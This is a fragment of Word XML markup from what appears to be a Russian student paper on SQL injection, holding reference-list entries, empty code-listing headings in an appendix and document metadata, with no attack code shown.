          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2014.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www</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ibm</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com</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developerworks</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library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se</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injection</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attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02D75"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слепые </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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>иънекции</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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xml:space="preserve">/. – 2014. –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BD</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1%81%</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8/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slepye</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inekcii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</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и </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADO</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 xml:space="preserve">-инъекции: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00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</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my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_</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base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level</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6/6_3.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006A740F" w:rsidRPr="009B2356" w:rsidRDefault="006A740F" w:rsidP="009B2356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EvilSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : http://www.evilsql.com/main/index.php/. -URL: http://www.evilsql.com/main/page1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection: http://www.w3schools.com. -URL:  http://www.w3schools.com/sql/sql_injection.asp</w:t>
      </w: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D21A0A" w:rsidRDefault="00020A8D" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc420429541"/>
      <w:bookmarkStart w:id="24" w:name="_Toc420596246"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc420429542"/>
      <w:bookmarkStart w:id="26" w:name="_Toc420596247"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="006C445E"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Абстрактный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базовый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класс</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="006C445E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc420429543"/>
      <w:bookmarkStart w:id="28" w:name="_Toc420596248"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>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27"/>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Pr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc420429544"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc420596249"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>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29"/>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FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc420429545"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc420596250"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="009F0170">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00543C05" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методы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9F0170">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bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc420429546"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StoreProcedureLessonsDal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00020A8D" w:rsidRPr="009F0170" w:rsidRDefault="00020A8D" w:rsidP="003F3D0F">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_sqlConnection.Close();</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FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc420429547"/>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EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc420596251"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>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4"/>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[NewBase]</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[NewBase]</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66A" w:rsidRDefault="0096766A" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0096766A" w:rsidRDefault="0096766A"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66A" w:rsidRDefault="0096766A" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0096766A" w:rsidRDefault="0096766A" w:rsidP="004936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5282A3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E168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6C51D87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1152D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FE5A7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97BC7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966D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="431C1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5"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="32"/>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20866"/>
    <w:rsid w:val="00020A8D"/>
    <w:rsid w:val="00034EEB"/>
    <w:rsid w:val="00045266"/>
    <w:rsid w:val="00053534"/>
    <w:rsid w:val="000606E8"/>
    <w:rsid w:val="0008117F"/>
    <w:rsid w:val="000A78D7"/>
    <w:rsid w:val="000B289E"/>
    <w:rsid w:val="000C551A"/>
    <w:rsid w:val="000E7610"/>
    <w:rsid w:val="000F43FF"/>
    <w:rsid w:val="00116404"/>
    <w:rsid w:val="001202D9"/>
    <w:rsid w:val="001203E1"/>
    <w:rsid w:val="00165AA1"/>
    <w:rsid w:val="001708CA"/>
    <w:rsid w:val="00171CDD"/>
    <w:rsid w:val="0017464E"/>
    <w:rsid w:val="00176FF7"/>
    <w:rsid w:val="001931C4"/>
    <w:rsid w:val="001F5ACA"/>
    <w:rsid w:val="002407D8"/>
    <w:rsid w:val="00264D42"/>
    <w:rsid w:val="0027327E"/>
    <w:rsid w:val="00291342"/>
    <w:rsid w:val="002926C9"/>
    <w:rsid w:val="002A4219"/>
    <w:rsid w:val="002B6CA7"/>
    <w:rsid w:val="002C2095"/>
    <w:rsid w:val="002C385A"/>
    <w:rsid w:val="002C7B42"/>
    <w:rsid w:val="002D7F39"/>
    <w:rsid w:val="002E0A68"/>
    <w:rsid w:val="00301693"/>
    <w:rsid w:val="00317A2F"/>
    <w:rsid w:val="00347079"/>
    <w:rsid w:val="003665AA"/>
    <w:rsid w:val="00370BC8"/>
    <w:rsid w:val="0039677A"/>
    <w:rsid w:val="003A515D"/>
    <w:rsid w:val="003B32C2"/>
    <w:rsid w:val="003B7814"/>
    <w:rsid w:val="003E5B4F"/>
    <w:rsid w:val="003E6B06"/>
    <w:rsid w:val="003F3D0F"/>
    <w:rsid w:val="00401E79"/>
    <w:rsid w:val="00417CBE"/>
    <w:rsid w:val="00423C8F"/>
    <w:rsid w:val="00431DC3"/>
    <w:rsid w:val="004325F4"/>
    <w:rsid w:val="004328E5"/>
    <w:rsid w:val="0046706C"/>
    <w:rsid w:val="004936B0"/>
    <w:rsid w:val="004A6E9B"/>
    <w:rsid w:val="004D6608"/>
    <w:rsid w:val="004D7FCD"/>
    <w:rsid w:val="004F5EBE"/>
    <w:rsid w:val="005001B9"/>
    <w:rsid w:val="00523F7D"/>
    <w:rsid w:val="005243F3"/>
    <w:rsid w:val="00543C05"/>
    <w:rsid w:val="00546C81"/>
    <w:rsid w:val="00546FBD"/>
    <w:rsid w:val="00565E42"/>
    <w:rsid w:val="005678D0"/>
    <w:rsid w:val="00576652"/>
    <w:rsid w:val="00594000"/>
    <w:rsid w:val="005D6B28"/>
    <w:rsid w:val="005F5687"/>
    <w:rsid w:val="006012B7"/>
    <w:rsid w:val="00611C15"/>
    <w:rsid w:val="00651CE6"/>
    <w:rsid w:val="00670F38"/>
    <w:rsid w:val="00671BB3"/>
    <w:rsid w:val="00671EE4"/>
    <w:rsid w:val="00680A21"/>
    <w:rsid w:val="006A740F"/>
    <w:rsid w:val="006C445E"/>
    <w:rsid w:val="006C7B5F"/>
    <w:rsid w:val="006D3DB3"/>
    <w:rsid w:val="0071081A"/>
    <w:rsid w:val="00742A82"/>
    <w:rsid w:val="00753818"/>
    <w:rsid w:val="00782588"/>
    <w:rsid w:val="007A3298"/>
    <w:rsid w:val="007A32FA"/>
    <w:rsid w:val="007C086F"/>
    <w:rsid w:val="007C78D1"/>
    <w:rsid w:val="007E142F"/>
    <w:rsid w:val="007E3794"/>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2C84"/>
    <w:rsid w:val="008E55BC"/>
    <w:rsid w:val="008F0DAD"/>
    <w:rsid w:val="009148D6"/>
    <w:rsid w:val="00920FAE"/>
    <w:rsid w:val="0093054C"/>
    <w:rsid w:val="00937BB9"/>
    <w:rsid w:val="00950EF9"/>
    <w:rsid w:val="0096766A"/>
    <w:rsid w:val="00973366"/>
    <w:rsid w:val="009B2356"/>
    <w:rsid w:val="009B366E"/>
    <w:rsid w:val="009B66DE"/>
    <w:rsid w:val="009B74C2"/>
    <w:rsid w:val="009D473D"/>
    <w:rsid w:val="009F0170"/>
    <w:rsid w:val="009F558E"/>
    <w:rsid w:val="00A02D75"/>
    <w:rsid w:val="00A1439B"/>
    <w:rsid w:val="00A455ED"/>
    <w:rsid w:val="00A5429B"/>
    <w:rsid w:val="00A852C0"/>
    <w:rsid w:val="00A91F54"/>
    <w:rsid w:val="00AB5BFF"/>
    <w:rsid w:val="00AC3A96"/>
    <w:rsid w:val="00AD04F4"/>
    <w:rsid w:val="00AD3834"/>
    <w:rsid w:val="00AD6EEA"/>
    <w:rsid w:val="00AE219B"/>
    <w:rsid w:val="00AF3055"/>
    <w:rsid w:val="00B53B61"/>
    <w:rsid w:val="00B5780C"/>
    <w:rsid w:val="00B60516"/>
    <w:rsid w:val="00B73CCD"/>
    <w:rsid w:val="00B82224"/>
    <w:rsid w:val="00BB019C"/>
    <w:rsid w:val="00BD45DC"/>
    <w:rsid w:val="00BF120D"/>
    <w:rsid w:val="00C0360F"/>
    <w:rsid w:val="00C25028"/>
    <w:rsid w:val="00C250C0"/>
    <w:rsid w:val="00C82EC8"/>
    <w:rsid w:val="00CB63D1"/>
    <w:rsid w:val="00D11F44"/>
    <w:rsid w:val="00D21A0A"/>
    <w:rsid w:val="00D26CBB"/>
    <w:rsid w:val="00D3591E"/>
    <w:rsid w:val="00D42262"/>
    <w:rsid w:val="00D73001"/>
    <w:rsid w:val="00D93C92"/>
    <w:rsid w:val="00DD518C"/>
    <w:rsid w:val="00DE3C27"/>
    <w:rsid w:val="00DE4481"/>
    <w:rsid w:val="00DF708C"/>
    <w:rsid w:val="00E12733"/>
    <w:rsid w:val="00E17E00"/>
    <w:rsid w:val="00E25A3F"/>
    <w:rsid w:val="00E2666F"/>
    <w:rsid w:val="00E27B80"/>
    <w:rsid w:val="00E737A5"/>
    <w:rsid w:val="00EB18EE"/>
    <w:rsid w:val="00EB5DBA"/>
    <w:rsid w:val="00EE02CA"/>
    <w:rsid w:val="00F06FEA"/>
    <w:rsid w:val="00F32B80"/>
    <w:rsid w:val="00F54FFF"/>
    <w:rsid w:val="00F84B90"/>
    <w:rsid w:val="00F8771A"/>
    <w:rsid w:val="00FA3BFA"/>
    <w:rsid w:val="00FA7AED"/>
    <w:rsid w:val="00FC4D17"/>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168260187">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347321640">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461071953">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15815552">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40080073">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2EE20D-DC6A-4FB8-94BD-73B8F98D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33</Pages>
  <Words>6812</Words>
  <Characters>38829</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>323</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45550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112</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-09T08:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-28T14:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>